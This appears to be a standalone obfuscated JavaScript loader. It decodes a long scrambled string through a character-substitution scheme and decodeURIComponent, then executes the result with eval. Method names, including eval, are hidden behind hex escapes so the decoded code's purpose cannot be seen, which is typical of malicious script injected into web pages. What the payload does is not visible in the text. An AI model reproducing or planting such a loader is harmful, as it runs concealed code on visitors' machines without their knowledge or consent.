﻿var $M = ((s\u0065\u006Cf + ([] * 0) * 1)[([] * 0) ^ ([] ^ [])] == '\x5B');
if ($M) {
    $p = ['9;%3=%b!%a_%4{%8$%f+%0,%c~%e(%d&%7`%6-%2', '%1}%5['];
}
var $q = {
    '$XJ': 'j\x6F\x69n',
    '$QB': 'deco\x64\x65\x55\x52\x49\x43\x6F\x6D\x70onent',
    '$OS': '\x73plit',
    '$7Z': true,
    '$Rc': [],
    '$ks': 'sub\x73\x74r'
}, $Fn = function (_) {
    for ($h = ~$q.$Rc - ~$q.$Rc; $h < $u[_]; $h += -~$q.$7Z) {
        $p += '\x25' + $u[$h++] + $u[$h--];
    }
    $e['e\x76al']($e[$q.$QB]($p));
}, $u = '`--}`)),-}-~-}`)-&),=&))=,))=!,&,_`--}`)),-=-+-(`{-[-(`{),=&),-{-+-=`[-&-[-(`{=!,&,_,&,_-;--),)$)$-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-)-+-{`;)));),)}=&),-(`[-~-~););,&,_`!,&,_,;-{-+-=`[-&-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$)`-)-+-{`;)`);)(`=`{`;-~-[)(-{-;`=`,-~-}`;),=&),)`-)-~-+-=-!)`=!,&,_,&,_`&,&,_,&,_,&,_,&,_--`[-(-=`{-;-+-(),-}),)$);,&,_`!,&,_,;-;--),)$)$-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-~-;-(-!`=)));),)}=&),-(`[-~-~););,&,_,;`!,&,_,;,;`--}`)),`{-[-&`,),=&),-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-~-;-(-!`=)));)(-;-(-(-[`){$[{{&{~=!,&,_,;,;-;--),)$)$`{-[-&`,)(-;-(-{-[`${+--)$)`-(-+---+-~-~-+``)`);)!=});),=(),=,);),),-}-~-}`)-&),=&),))=}))=!,&,_,;,;-[-~`=-[),-;--),)$)$`{-[-&`,)(-;-(-{-[`${+--)$)`-(-+-;-(-{-[`$)`);)!=});),=(),=,);),),-}-~-}`)-&),=&),))=}))=!,&,_,;`&,&,_,;-[-~`=-[),-}-~-}`)-&),=&),))=}))=!,&,_`&,&,_,&,_--`[-(-=`{-;-+-(),-)),)$);,&,_`!,&,_,;-;--),)$)$-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-}-})));),)}=&),-(`[-~-~);),)-)-),)$-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-}-))));),)}=&),-(`[-~-~););,&,_,;`!,&,_,;,;`{-[-&`,),=&),-{-+-=`[-&-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-}-})));)(-$`)-[--=!,&,_,;,;-;--),)$))-$`{`{`,=_)+)+`[-=)&`,-+`)`{-}-~-~-[`))(`)`[)+))),)}=&),`{-[-&`,);),-}-~-}`)-&),=&),))=}))=!,&,_,&,_,;,;`{-[-&`,),=&),-{-+-=`[-&-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-}-))));)(-;-(-(-[`){$[{{&{~=!,&,_,;,;-;--),)$))&}$}&,!_&}$,&,!$&,!+&}$)&}$!),&,!{&,!!&}$+),`[-=-+`_))),)}=&),`{-[-&`,);),-}-~-}`)-&),=&),))=}))=!,&,_,;`&,&,_,;-[-~`=-[),-}-~-}`)-&),=&),))=}))=!,&,_`&,&,_,&,_--`[-(-=`{-;-+-(),-=),)$);,&,_`!,&,_,;-;--),)$)$-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-)-})));),)}=&),-(`[-~-~);),)-)-),)$-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-)-))));),)}=&),-(`[-~-~););,&,_,;`!,&,_,&,_,;,;`{-[-&`,),=&),-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-)-})));)(-$`)-[--=!,&,_,;,;-;--),)$))-$`{`{`,=_)+)+``````)(-}`)-[-(-{-}-)-+-}`)-{)(`)`[)+))),)}=&),`{-[-&`,);),-}-~-}`)-&),=&),))=}))=!,&,_,&,_,;,;`{-[-&`,),=&),-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-)-))));)(-;-(-(-[`){$[{{&{~=!,&,_,;,;-;--),)$))&,!_&}$=&,!+&,!!&}$(),&,!_&,!)&,!,&}$,&}$)&,!$&}$,&}$=))),)}=&),`{-[-&`,);),-}-~-}`)-&),=&),))=}))=!,&,_,;`&,&,_,;-[-~`=-[),-}-~-}`)-&),=&),))=}))=!,&,_`&,&,_,&,_--`[-(-=`{-;-+-(),-{),)$);,&,_`!,&,_,;-;--),)$)$-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-=-})));),)}=&),-(`[-~-~);),)-)-),)$-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-=-))));),)}=&),-(`[-~-~););,&,_,;`!,&,_,&,_,;,;`{-[-&`,),=&),-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-=-})));)(-$`)-[--=!,&,_,;,;-;--),)$))-$`{`{`,=_)+)+``````)(---+`))&-=`)-[-}`{-;`--[)(-=-+-&)+))),)}=&),`{-[-&`,);),-}-~-}`)-&),=&),))=}))=!,&,_,&,_,;,;`{-[-&`,),=&),-=-+-(`{-[-(`{)(-`-[`{{[-~-[-&-[-(`{{)`;{;-{)$))-=-))));)(-;-(-(-[`){$[{{&{~=!,&,_,;,;-;--),)$))&}$$&,!,&,!}&,!!&,!(&,!&&}$!),&,!{&,!!&}$+),`[-=-+`_))),)}=&),`{-[-&`,);),-}-~-}`)-&),=&),))=}))=!,&,_,;`&,&,_,;-[-~`=-[),-}-~-}`)-&),=&),))=}))=!,&,_`&,&,_,&,_-}),)$);=!,&,_,&,_-;--),)$-}-~-}`)-&),=&=&),))=,)));),-)),)$);=!,&,_-;--),)$-}-~-}`)-&),=&=&),))=,)));),-=),)$);=!,&,_-;--),)$-}-~-}`)-&),=&=&),))=,)));),-{),)$);=!,&,_,&,_-;--),)$-}-~-}`)-&),=&=&),))=})));),`,`)-+-&`,`{)$)`&,;&&,!,&}$,&}$=&}$$&,![&,!&&}$!),&}$=&}$}&,!!&,!(&,!)&,!$&}$+),&,!$&}$}&,!+&,!(&,!!&}$~&,!`&,!(&,!)&,!,&,!&&,!$&}$+)~),&,!+&,!(),&,!)&}$}&,![&,!~),&,!)&,!(&,!+&}$,&,!(&}$}&,!,&,!~),&,!(&,!}&}$,&,!,&}$;&,!,&,!;&}$)&,![&}$}&}$~),&,!)),{;{=[}=_)`)~),)`===`=-=$=$=,===;=[)`);=!', $i = function () {
    $i = $p[$q.$XJ]('\x29')[$q.$OS]('\x25');
    for (var $E in $i) {
        $u = $u[$q.$OS]($i[$E][$q.$ks](1))[$q.$XJ]($i[$E][([] ^ [])]);
    }
    return this;
}, $e = $i(), $p = '';
$Fn('\x6C\x65ngth');